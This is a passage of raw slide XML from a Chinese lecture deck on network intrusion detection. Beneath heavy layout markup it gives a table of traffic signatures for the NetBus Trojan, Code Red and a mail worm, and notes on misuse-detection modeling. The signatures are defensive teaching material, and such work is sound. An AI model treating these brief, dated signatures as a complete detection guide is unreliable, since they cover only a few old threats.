                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>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en-US" altLang="zh-CN"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NetbusTrojan</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目标地址多且目标端口号为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="18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12345</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>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en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="333399"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>Red Code</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大量目的端口号为</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80</a:t>
                      </a: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、协议类型</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80</a:t>
                      </a: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、包数</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3</a:t>
                      </a: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、字节数为</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144</a:t>
                      </a:r>
                      <a:endPar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endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="457310">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="447675" marR="0" lvl="0" indent="-447675" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="16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邮件蠕虫</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="447675" marR="0" lvl="0" indent="-447675" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"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流数大，目标地址单一且源端口都为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="333399"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>25</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="4551131"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799" y="3293025"/>
              <a:ext cx="1109128" cy="49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特征分析</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数据模板举例</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DDD6E48-2B57-416C-89A4-DE2AFDA1FC07}"/>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782883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FD177DF3-21B0-FC7B-614C-E8C43250A66F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1902576" y="2405203"/>
            <a:ext cx="8199755" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="12913" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C84F2B6-D81E-FFE5-C9FD-81E744326FEC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="1168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根据网络入侵行为特征建立误用证据模型</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="45" name="组合 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF6AE7C8-5E60-4AD6-3110-0159EB4BA3C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="54" name="图片 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{853B25E0-99DB-E1E1-166E-085771D3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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20747126-026A-1CBD-CCDF-9BEE36C01A0B}"/>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1080000" y="1260000"/>
            <a:ext cx="2958353"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模型推理误用检测</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="61" name="组合 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD9BDD0-5946-5F6B-B812-F57888F8AE7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1925520" y="3005287"/>
            <a:ext cx="957580" cy="957580"/>
            <a:chOff x="3713" y="3122"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="63" name="图片 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC18D26F-F23E-E81A-1DDA-D479B1D2A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64" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E0DC1F2-44D9-60A7-BC62-A30BE121CDAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FFEE54-351A-D541-1D88-AE6C307B93AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2729828" y="3193539"/>
            <a:ext cx="867791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rPr>
              <a:t>需建立攻击场景数据库、预警器和规划者</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="115" name="图片 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CB772D6-0642-3D89-AB03-909914097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412" y="3953514"/>
            <a:ext cx="2757857" cy="1840007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="317500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95125FB0-60C1-12DC-2AB2-B22D10F47917}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1120800" y="3934870"/>
            <a:ext cx="1118136" cy="734063"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E4CE963-F20D-3DA3-778F-16FE4755A1D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2" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{546A2FC3-F0B7-AAD4-784A-D257AC4A5120}"/>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3" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE3146E7-C544-79FC-29C9-E8FD402D4938}"/>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优势</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="55" name="组合 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC2CAF4C-5F47-A3FC-88E7-E87216CDA198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="964303" y="4771825"/>
            <a:ext cx="4315460" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6796" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08107D9E-9DCA-C4A4-62CB-DB82797F29B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="585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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>未确定推理</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>理论为基础，模型证据推理中间结论</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="62" name="组合 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{161AF3A1-9FF4-AB39-29A8-2F5724006FB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="65" name="图片 64">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DF1DB47-DA7F-4196-2A5F-28764B17C2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6" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72CB3096-3891-542A-0EF6-5D998E80595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7" name="组合 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1A9D3B5-7702-DAAD-8259-0F660B273144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="962061" y="5314183"/>
            <a:ext cx="2868295" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="4517" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41BC13D-E408-CB01-2F1D-46D083D22492}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="357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减少审计数据量</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="69" name="组合 68">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BB3445-E2C1-8E9A-7045-C11838E28958}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="70" name="图片 69">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6AB34BD-6F47-11ED-268B-6EDE27637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1" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14FF9671-E481-C906-5F3D-1A3E99F4F306}"/>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2" name="组合 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BBEAF26-FC79-5501-8B26-E03289EAC28D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5286880" y="3920674"/>
            <a:ext cx="1118136" cy="734063"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B85E2EE-99FB-6657-8019-A5B68926FA12}"/>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4" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE7B809F-5E45-90DA-7B07-7826A110291D}"/>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7" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D38F4A01-3424-3571-8DE9-71ACF9026897}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3860800"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不足</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="78" name="组合 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7475339-84A5-DA39-2BA2-50A53C32F938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167428" y="4644079"/>
            <a:ext cx="2214245" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="3487" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5407009-7ADD-2601-EAF8-186518D4D148}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="254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建模开销</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="80" name="组合 79">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{614168EB-3F70-75D1-07ED-72F5DA999087}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="81" name="图片 80">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{600E41AC-B8D5-2731-5408-CC73557B0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2" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA40BF8C-83A9-FA9B-717C-704C005B5308}"/>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83" name="组合 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96B6D011-7FEB-DE98-B184-0A9B0B23E96F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167428" y="5121472"/>
            <a:ext cx="3283585" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="5171" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8008E0BF-7B37-9BE3-0E89-C49B0F6BC1A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="422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需对数据库不断扩充</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="85" name="组合 84">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D886C81-C5C7-62EF-BC31-62763C5E7AC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="86" name="图片 85">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113D5DE8-B5AC-EFFF-6C8B-E8D999B299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7" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA15ACD9-3362-5987-FBF3-272FB2D44677}"/>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 name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24A532C4-2479-44C5-8586-86EB81374CAE}"/>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847471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9F413645-22F3-234C-6757-7AA5FDF58B39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2855365" y="2512794"/>
            <a:ext cx="1118136" cy="813758"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8A2A40-7143-E316-8A4B-4738C312DBA4}"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35A9F91A-BC74-49A2-9403-DD2F31155EFE}"/>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5" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C6A3BFD-1B82-8136-F48B-9B2FDB40688D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3860799" y="3293024"/>
              <a:ext cx="1109128" cy="41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62" name="组合 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
